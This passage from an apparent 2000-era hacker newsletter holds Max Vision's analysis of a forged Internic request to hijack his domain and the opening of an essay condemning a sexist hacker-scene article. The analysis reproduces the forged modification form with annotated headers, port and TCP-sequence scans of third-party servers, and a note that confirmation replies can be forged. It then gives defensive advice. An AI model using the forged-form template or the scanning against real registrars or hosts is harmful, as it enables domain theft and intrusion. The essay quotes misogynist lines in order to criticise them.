(*shrug*). I ~ :wrote a brief account of what happened. ~ : ~ : Internic Domain Hijacking - "It Happens" ~ : http://dev.whitehats.com/papers/internic/index.html ~ : ~ :Of course, I have still heard *nothing* from Internic, AOL, or any parties ~ :involved in the attempted hijacking. ~ : A friend of mine had several domains of him stolen the same way, when some freak got access to his mailbox. it took me a week (including messing around that dude boxen) to get all the stuff back. Otherwise it could take months to go into legal trial to return the domain. Network solutions really should have a better clue while dealing with such stuff. -=- KRS: Key R00t Systems IRC: EFnet channel #!krs Founder: Mnemonic (* AOL user) Website(s): http://s-club.4mg.com/ (Now inactive) -=- Details of attack: http://dev.whitehats.com/papers/internic/index.html Internic Domain Hijacking - "It Happens" Max Vision, http://www.maxvision.net/ OVERVIEW This morning I witnessed an attempted takeover of one of my domains, MAXVISION.NET. The attacker, calling themself "Mnemonic of the group KeyRoot", using an AOL.COM address, attempted to spoof a request from me to change the primary and secondary DNS servers for my domain, to Network Solutions / Internic. If successful, this request would effectively give them control of maxvision.net until I could have sorted it out with Internic. Their attempt was foiled for several reasons, which I will outline below. THE ATTACK The attacker sent a forged Domain Modification form to Internic. There were several incompotent errors in the submission that caused the submission to fail. Had these errors not been made, and had I relied on the MAIL-FROM mechanism of Internic, then control of my domain would have been effectively hijacked. Overview of forged email path: The first sign that something was going on was an email from Internic, confirming "my request". Email confirmation "response" from Internic Date: Sun, 2 Jan 2000 17:19:50 -0500 (EST) From: hostmaster@internic.net To: Max Vision Subject: Re: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net This is an automatic reply from Network Solutions to acknowledge that your message has been received. This acknowledgement is NOT a confirmation that your request has been processed. If you need to correspond with us regarding this request, please be sure to reference the tracking number [[NIC-000102.b318]] in the subject of your message. Regards, InterNIC Registration Services ... other standard Internic advertising followed (omited) Moments later I received an error message from Internic (the attacker had made a mistake), which provided me with the evidence I needed to track the offender. Email error "response" from Internic Date: Sun, 2 Jan 2000 17:20:29 -0500 (EST) From: Domain Registration Role Account Reply-To: hostmaster@internic.net To: vision@HUNGRY.COM Subject: Re: [NIC-000102.b318] MAXVISION.NET The Domain Name Registration Agreement below has been returned to you due to the following errors. Please review the Domain Name Registration Agreement instructions available at ftp://www.networksolutions.com/templates/domain-template.txt. The glossary of the parser errors is available at ftp://www.networksolutions.com/templates/domain-parser-errors.txt Network Solutions Registration Services email hostmaster@networksolutions.com dreg08 The attacker had tried to use the same DNS server as primary and secondary ========================================================================= ERROR: duplicate item 8 /<209.210.67.126> Either the hostname or the IP address of a name server matches that of another server in the server list. ========================================================================= The From header was spoofed, the upper case indicates it was copied from my whois record >From vision@HUNGRY.COM Sun Jan 2 17:17:06 2000 >Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15]) > by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490 > for ; Sun, 2 Jan 2000 17:17:05 -0500 (EST) >Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000 This mail server was used to bounce the message. LAME! See my mailrelay writeup. Note that the attacker used smtp9.gateway.net which seems to forward through an internal "gateway.net" server, thus the 192.168 non-routable address. >Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253) > by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000 This indicates the attacker sent "HELO HUNGRY.COM" in their email forgery session however, their true IP is shown as 152.201.160.206 >Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206]) > by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460 > for ; Sun, 2 Jan 2000 17:17:03 -0500 (EST) >Message-ID: <386FCEFC.9D64F794@HUNGRY.COM> >Date: Sun, 02 Jan 2000 17:19:40 -0500 >From: Max Vision >Organization: Max Vision They set this as part of their use of gateway.net to forge the email >X-Sender: "Max Vision" (Unverified) If they didn't forge this header, it looks like an outdated Netscape on win98 >X-Mailer: Mozilla 4.06 [en]C-gatewaynet (Win98; I) >MIME-Version: 1.0 >To: hostmaster@networksolutions.com >Subject: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net >Content-Type: text/plain; charset=us-ascii >Content-Transfer-Encoding: 7bit >X-MTS-Ticket: 000102.b318 >X-MTS-Type: Domain >X-MTS-Mode: Modify >X-MTS-Priority: Normal >X-MTS-Status: Open >X-MTS-Timestamp: 000102171706 > > >---------------------------------------------------- >This is the Domain Name Registration Agreement you >recently created. >In order to complete this modification, > >YOU MUST E-MAIL THIS FORM TO: hostmaster@networksolutions.com > >After you e-mail this form, you should receive an auto-reply >with a tracking number. You must use that number in the >Subject of any future messages you send regarding >this registration action. >Once this registration action is completed you will receive >a notification via e-mail. > >**** PLEASE DO NOT REMOVE Version Number or any of the information below >when submitting this template to hostmaster@networksolutions.com. ***** > >Domain Version Number: 5.0 > >********* Email completed agreement to hostmaster@networksolutions.com >********* > > >AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) >through our online application process or by applying for and registering a >domain name as part of our e-mail template application process or by using >the service(s) provided by Network Solutions under the Service Agreement, >Version 5.0, you acknowledge that you have read and agree to be bound by all >terms and conditions of this Agreement and any pertinent rules or policies >that are or may be published by Network Solutions. > >Please find the Network Solutions Service Agreement, Version 5.0 located >at >the URL href="http://www.networksolutions.com/legal/service-agreement.html">http://www.networksolutions .com/legal/service-agreement.html. > > >[URL ftp://www.networksolutions.com] >[11/99] > >Authorization The attacker used the wrong text here, ignorant switching of "Name" for "New" >0a. (N)ew (M)odify (D)elete.........: M Name Registration >0b. Auth Scheme.....................: MAIL-FROM >0c. Auth Info.......................: > >1. Comments........................: > >2. Complete Domain Name............: maxvision.net > >Organization Using Domain Name Here they retained my old contact info >3a. Organization Name................: Max Vision >3b. Street Address..................: 65 Washington Ave Suite 180 >3c. City............................: Santa Clara >3d. State...........................: CA >3e. Postal Code.....................: 95050 >3f. Country.........................: US > >Administrative Contact and here they tried to make "themself" the admin contact >4a. NIC Handle (if known)...........: >4b. (I)ndividual (R)ole?............: Individual >4c. Name (Last, First)..............: Stakl, Joe >4d. Organization Name...............: Max Vision there is no gGate street in this city, AFAIK >4e. Street Address..................: 1458 Gate St. >4f. City............................: Saint Mary >4g. State...........................: MD >4h. Postal Code.....................: 20618 >4i. Country.........................: USA This number is invalid >4j. Phone Number....................: 401-597-0588 >4k. Fax Number......................: >4l. E-Mailbox.......................: vision@HUNGRY.COM > >Technical Contact Same problems as Admin contact info above >5a. NIC Handle (if known)...........: >5b. (I)ndividual (R)ole?............: Individual >5c. Name(Last, First)...............: Stakl, Joe >5d. Organization Name...............: Max Vision >5e. Street Address..................: 1458 Gate St. >5f. City............................: Saint Mary >5g. State...........................: MD >5h. Postal Code.....................: 20618 >5i. Country.........................: USA >5j. Phone Number....................: 401-597-0588 >5k. Fax Number......................: >5l. E-Mailbox.......................: vision@HUNGRY.COM > >Billing Contact How nice of them, leave me the bill >6a. NIC Handle (if known)...........: MV777 >6b. (I)ndividual (R)ole?............: Individual >6c. Name (Last, First)..............: >6d. Organization Name...............: >6e. Street Address..................: >6f. City............................: >6g. State...........................: >6h. Postal Code.....................: >6i. Country.........................: >6j. Phone Number....................: >6k. Fax Number......................: >6l. E-Mailbox.......................: > These are the nameservers they intended to use in the hijacking The IP addresses resolve to >Prime Name Server >7a. Primary Server Hostname.........: S-CLUB.4MG.COM >7b. Primary Server Netaddress.......: 209.210.67.126 > >Secondary Name Server(s) >8a. Secondary Server Hostname.......: S-CLUB.4MG.COM >8b. Secondary Server Netaddress.....: 209.210.67.126 > > >END OF AGREEMENT > > >For instructions, please refer to: >"http://www.networksolutions.com/help/inst-mod.html" The trail of evidence is overwhelming. Here is the breakdown, then I'll discuss each element: attacker, using an AOL.COM IP address, send forged email using GATEWAY.NET mail relay. This is known to be true, since the networksolutions.com mail server (rs.internic.net) is resistant to TCP spoofing, as is relaye.gateway.net. the AOL.COM address was inactive, so they must have disconnected immediately after sending the forged email (AOL absolutely does not care *at all* about this, and all attempts to reach the abuse or security teams of AOL, Gateway.NET, and Internic have yielded no reply. NO WONDER.) the contact information was all false. The only point of control that the attacker gets is the DNS service. If the attacker intended Denial of Service, then they might not have control of the Linux DNS server. If the attacker intended control of the domain, then they either own/operate the Linux DNS server, or they have rooted the machine. The Linux DNS server is a freeservers.com webhosting server - when the HTTP/1.1 hostname s-club.4mg.com is used, the following webpage appears (indicating that they do have control of the linux server, and that they intended to hijack my domain and Nokia's): Internic's mail server is not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the relay host, relaye.gateway.net. not spoofed: rs.internic.net rs.internic.net (198.41.0.6) TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Sequence numbers: 3763161D 84916A9 979391FC 660A454A 4D3417E0 5DD7DB3B relaye.gateway.net is also not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the attacker, 98C9A0CE.ipt.aol.com [152.201.160.206]. not spoofed: mail relay host relaye.gateway.net (208.230.117.253): TCP Sequence Prediction: Class=random positive increments Difficulty=50749 (Worthy challenge) Remote operating system guess: BSDI BSD/OS 3.0-3.1 Based on this information, the liklihood of the email being truly forged (at the packet level) are extremely low. This appears to be a straightforward application-level forgery from the AOL account. Having a look at the DNS server that the attacker was trying to substitute for mine, to control the domain, we see it is an older Linux system, that is acting as a virtual webserver. I have contacted that rightful administrators of the system about the attempted attack. overview: substitute dns server FreeServers.com - www26 Server Provo, Utah - USA www26.freeservers.com (209.210.67.126): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 80 open tcp http 111 open tcp sunrpc 113 open tcp auth 513 open tcp login 514 open tcp shell 2049 open tcp nfs 3306 open tcp mysql TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Remote operating system guess: Linux 2.0.35-37 HOW TO DEFEND YOURSELF Internic offers three authentication methods for domain administrators. MAIL-FROM, CRYPT-PW, and PGP. Each can be used to effectively protect against this type of hijacking effect, each with increasing levels of effectiveness. The following are summaries that discuss how each is used. After each description I'll briefly discuss their vulnerabilities. MAIL-FROM MAIL-FROM is the most basic type of authentication scheme. Under this level of protection, Network Solutions will verify that a Domain Name Registration Agreement, Contact Form or Host Form was submitted from the e-mail address, as listed in our database, of the administrative or technical contact of the record to be changed. MAIL-FROM checks to see that requests to update your contact record -- or any record that you are associated with -- are sent from the current E-mail address of the contact. By default, all the contacts in the database have MAIL-FROM protection unless they have used the Contact Form to associate their contact record with a PGP key or an encrypted password. MAIL-FROM is the default authentication scheme. If you are not sure which of the three options to select, choose MAIL-FROM - it is the default. MAIL-FROM is the default, and weakest security level. Don't follow their advice, use CRYPT-PW at the minimum. CRYPT-PW In the protection hierarchy, encrypted password, or CRYPT-PW, is the next highest level of protection for a domain name registration record. CRYPT-PW allows updates to be submitted from any e-mail address, and, if the correct password is supplied, Network Solutions will process the Domain Name Registration Agreement, Contact Form or Host Form. If you would like to guard your contact record -- and any other database records that you are a contact for -- with a password, enter the plain text of the password in the box below. After you enter the password in the box below it will be encrypted and entered on the form in the correct place. Enter the password a second time to verify that you have entered the plain text of the password correctly. Do not lose this password. Updates to database records may be significantly delayed if this password is lost. CRYPT-PW is a more secure authentication mechanism, as it requires the use of the correct password to effect a domain change. This may be exceedingly difficult to guess, as Internic may have anti-password-guessing measures in place to curb endless "guesses". PGP Pretty Good Privacy provides the highest level of security. PGP is an encryption and digital signature scheme. While 100% security can never be guaranteed, PGP is a very safe scheme. In order to use PGP as your authentication scheme, the PGP software must be installed on your computer. This software is available both commercially and as freeware. If you wish to protect your contact record -- and all records that you are a listed contact for -- with Pretty Good Privacy encryption software, choose this option. IMPORTANT: You must obtain the PGP software and install it on your computer before you can use this security feature. PGP is available commercially and as shareware. To find out more about getting started with PGP, read our help files on how to obtain and install PGP. Your PGP key MUST be added to the Network Solutions' key server before you can use the Contact Form to associate a PGP public key with this contact. Enter the key ID of your PGP public key in the box below. If you have installed the PGP software on your machine but you do not know your key ID, type: pgp -kvc on your local machine to discover the eight digit key ID of your PGP key. IMPORTANT: If you have selected PGP, keep in mind that when the contact template is generated and E-mailed to you, you must FIRST sign the update request with your secret PGP key before sending the contact template to NetworkSsolutions. PGP is the strongest security level, as it is virtually impossible for an attacker to guess the correct private key. PGP is widely held to be one of the more secure/trusted forms of encryption/authentication. There are also settings for "Notification Levels" for updates or usage. If an attacker is aware of this, they can forge the request email, and then forge an additional ACK email. Notification Levels The administrative and technical contact/agent will each choose when they would like to be notified to validate a Domain Name Registration Agreement, Contact Form or Host Form. The options they can choose from are: BEFORE-UPDATE; AFTER-UPDATE; and NOT-CARE. The administrative and technical contacts are not required to choose the same option. Network Solutions will act upon the first reply we receive. If the contact selects BEFORE-UPDATE, Network Solutions will send a confirmation request before any changes are made, even if the request was received from an authorized source. The contact then has the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If the contact does not agree with the change request, replying "NAK" or "NO" to the notification will prevent any changes from being made. Selecting BEFORE-UPDATE may delay legitimate changes while Network Solutions waits for approval to make the requested change. If the contact selects AFTER-UPDATE, Network Solutions will send a confirmation request after changes have been made. Even if AFTER-UPDATE is the selected level of protection, Network Solutions will only process a Domain Name Registration Agreement, Contact Form or Host Form if it was received from an authorized source, or if the registrant gives its express written permission to make the requested change. Both the administrative and technical contacts have the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If either one of the contacts does not agree with the change request, replying "NAK" or "NO" to the notification will usually reverse any changes that were made. AFTER-UPDATE is the default option if no other type of notification is selected. If the contact selects NOT-CARE, Network Solutions will never send a confirmation to that contact. By choosing this option, the contact establishes that they are not concerned about whether or not authorized changes are made to any domain name registration, contact record or host record with which he is associated. As stated above, MAIL-FROM is not really enhanced with the BEFORE-UPDATE feature, as an attacker could forge a corresponding ACK message. CONCLUSION There are some serious security issues with the current Internic Guardian system. Domain Hijacking is as easy as ever, and many newbie crackers have been actively using this attack to hijack websites addresses. Over the Y2K weekend it was rumored that several large sites suffered from this attack. If you are a domain contact and have not set encryption authentication options such as CRYPT-PW or PGP, then DO SO NOW! Max Vision @HWA 56.0 "A well known but overlooked threat to Hackers: Themselves" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackernews.com/bufferoverflow/00/threat.html In response to "Scene Whores" HNN buffer overflow article: A Well Known But Overlooked Threat to Hackers: Themselves By: Carole Fennelly The recent HNN article "Scene Whores" by Erik Parker was advertised as "controversial". There is a fine difference between "controversy" and "shock tactics". The first is intended to provoke discussion to reveal opposing sides of an issue. The second is intended to provoke outrage for the purposes of cheap publicity. I work in a city that is home to more radio "Shock Jocks" than any other. I am, unfortunately, well aware of the dangers of falling into the trap of responding to such tactics. For any who really believe the emotional and sexist ramblings of that article: no one will change your mind - and that is, indeed, unfortunate. For the others who just view it as harmless babble, I intend to prove that it is, indeed, harmful. The article promises to reveal an overlooked threat to hackers. It delivers nothing more than the emotional outburst of someone who was jilted. It should probably be simply dismissed for the immature rambling that it is. I cannot do so. Not because I am a woman - because I am a security professional who will not let pass an article that endorses FUD (Fear, Uncertainty and Doubt). This may not have been the intent, but it was the result. In this article, Mr. Parker comes to the conclusion that Scene Whores are female and hackers are male: "I will always refer to woman as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men. One passage brought to mind a scene in Dr. Strangelove where the general warns that women steal "our precious bodily fluids": " They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life" What the article succeeded in doing was to reinforce the stereotype that women have only one purpose in the technical world - sex. Further, it supports the medieval belief that women are evil and must be kept in their place: "Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission." I guess the next Defcon Event will be The Scene Whore Trials.. followed by burning them at the stake. Since the only method suggested to determine who these evil Scene Whores are is one of gender, all women must be guilty: "Now the hard part is.. To determine which ones aren't scene whores. The ones who have been wi